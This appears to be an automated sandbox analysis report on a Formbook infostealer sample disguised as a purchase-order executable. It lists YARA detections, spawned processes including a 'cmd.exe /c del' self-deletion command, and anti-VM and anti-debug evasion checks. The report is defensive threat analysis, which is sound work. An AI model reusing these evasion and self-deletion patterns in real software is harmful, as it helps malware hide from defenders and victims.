          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00861B900_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_0087B8E70_2_0087B8E7
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008780130_2_00878013
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008769020_2_00876902
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008781370_2_00878137
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00867BA60_2_00867BA6
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00869BA00_2_00869BA0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008657C90_2_008657C9
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0040103010_2_00401030
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B9D010_2_0041B9D0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B1FD10_2_0041B1FD
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C18410_2_0041C184
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00408A3010_2_00408A30
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B49510_2_0041B495
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00402D9010_2_00402D90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C70310_2_0041C703
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041BF1410_2_0041BF14
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B78510_2_0041B785
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00402FB010_2_00402FB0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087B8E710_2_0087B8E7
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087801310_2_00878013
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087690210_2_00876902
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087813710_2_00878137
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00861B9010_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00867BA610_2_00867BA6
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00869BA010_2_00869BA0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_008657C910_2_008657C9
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0126412010_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0124F90010_2_0124F900
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012699BF10_2_012699BF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0131E82410_2_0131E824
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0126A83010_2_0126A830
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0130100210_2_01301002
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012720A010_2_012720A0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013120A810_2_013120A8
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0125B09010_2_0125B090
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013128EC10_2_013128EC
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01312B2810_2_01312B28
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0126AB4010_2_0126AB40
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0127EBB010_2_0127EBB0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0130DBD210_2_0130DBD2
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013003DA10_2_013003DA
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012FFA2B10_2_012FFA2B
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013122AE10_2_013122AE
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01240D2010_2_01240D20
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01312D0710_2_01312D07
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01311D5510_2_01311D55
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0127258110_2_01272581
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0125D5E010_2_0125D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0470841F14_2_0470841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047B100214_2_047B1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C28EC14_2_047C28EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047220A014_2_047220A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C20A814_2_047C20A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0470B09014_2_0470B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C1D5514_2_047C1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046F0D2014_2_046F0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0471412014_2_04714120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046FF90014_2_046FF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C2D0714_2_047C2D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0470D5E014_2_0470D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C25DD14_2_047C25DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0472258114_2_04722581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04716E3014_2_04716E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C2EF714_2_047C2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C22AE14_2_047C22AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C2B2814_2_047C2B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C1FF114_2_047C1FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047BDBD214_2_047BDBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0472EBB014_2_0472EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C18414_2_0059C184
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00588A3014_2_00588A30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00582D9014_2_00582D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059BF1414_2_0059BF14
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00582FB014_2_00582FB0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: String function: 0124B150 appears 41 times
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: String function: 0086DF99 appears 54 times
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: String function: 00862D10 appears 94 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 046FB150 appears 35 times
          Source: PO#47974GH397.exe, 00000000.00000003.726994216.00000000007C6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO#47974GH397.exe
          Source: PO#47974GH397.exe, 0000000A.00000002.779294931.00000000014CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO#47974GH397.exe
          Source: PO#47974GH397.exe, 0000000A.00000002.778183836.00000000011BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs PO#47974GH397.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
          Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@10/6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
          Source: PO#47974GH397.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO#47974GH397.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: PO#47974GH397.exeReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO#47974GH397.exe File read: C:\Users\user\Desktop\PO#47974GH397.exe
          Source: unknownProcess created: C:\Users\user\Desktop\PO#47974GH397.exe 'C:\Users\user\Desktop\PO#47974GH397.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\PO#47974GH397.exe C:\Users\user\Desktop\PO#47974GH397.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#47974GH397.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO#47974GH397.exe Process created: C:\Users\user\Desktop\PO#47974GH397.exe C:\Users\user\Desktop\PO#47974GH397.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#47974GH397.exe'
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PO#47974GH397.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: PO#47974GH397.exe, 0000000A.00000002.778078911.00000000011B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000002.937959132.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: PO#47974GH397.exe, 0000000A.00000002.778078911.00000000011B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO#47974GH397.exe, 00000000.00000003.728838549.0000000002560000.00000004.00000001.sdmp, PO#47974GH397.exe, 0000000A.00000002.778206837.0000000001220000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000003.774600920.0000000000F70000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO#47974GH397.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000002.937959132.0000000005A00000.00000002.00000001.sdmp
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: PO#47974GH397.exeStatic PE information: real checksum: 0x334b6 should be: 0x5630e
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00862D56 push ecx; ret 0_2_00862D69
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C184 push dword ptr [2E33947Ah]; ret 10_2_0041C174
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C2FA push ecx; ret 10_2_0041C2FF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C288 push CCFB6AF2h; ret 10_2_0041C2AB
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_004192B5 push eax; iretd 10_2_004192BF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00414CED push ecx; ret 10_2_00414CEE
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041AD55 push eax; ret 10_2_0041ADA8
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041ADA2 push eax; ret 10_2_0041ADA8
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041ADAB push eax; ret 10_2_0041AE12
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00414E09 pushfd ; ret 10_2_00414E39
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041AE0C push eax; ret 10_2_0041AE12
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041BF14 push dword ptr [2E33947Ah]; ret 10_2_0041C174
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00862D56 push ecx; ret 10_2_00862D69
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0129D0D1 push ecx; ret 10_2_0129D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0474D0D1 push ecx; ret 14_2_0474D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C8CA push cs; ret 14_2_0059C8D1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C184 push dword ptr [2E33947Ah]; ret 14_2_0059C174
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C2FA push ecx; ret 14_2_0059C2FF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C288 push CCFB6AF2h; ret 14_2_0059C2AB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_005992B5 push eax; iretd 14_2_005992BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00594CED push ecx; ret 14_2_00594CEE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059AD55 push eax; ret 14_2_0059ADA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059ADAB push eax; ret 14_2_0059AE12
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059ADA2 push eax; ret 14_2_0059ADA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00594E09 pushfd ; ret 14_2_00594E39
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059AE0C push eax; ret 14_2_0059AE12
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059BF14 push dword ptr [2E33947Ah]; ret 14_2_0059C174
          Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO#47974GH397.exeRDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#47974GH397.exeRDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000005883C4 second address: 00000000005883CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 000000000058875E second address: 0000000000588764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00408690 rdtsc 10_2_00408690
          Source: C:\Windows\explorer.exe TID: 6244 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6236 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00872595 FindFirstFileExW,0_2_00872595
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00872595 FindFirstFileExW,10_2_00872595
          Source: explorer.exe, 0000000B.00000000.748615085.0000000004710000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.755191974.000000000A897000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.754266906.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000B.00000000.750256500.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.748615085.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000B.00000000.754376302.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000B.00000000.754437763.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_00408690 rdtsc 10_2_00408690
Source: C:\Users\user\Desktop\PO#47974GH397.exe | Code function: 10_2_004098F0 LdrLoadDll, 10_2_004098F0
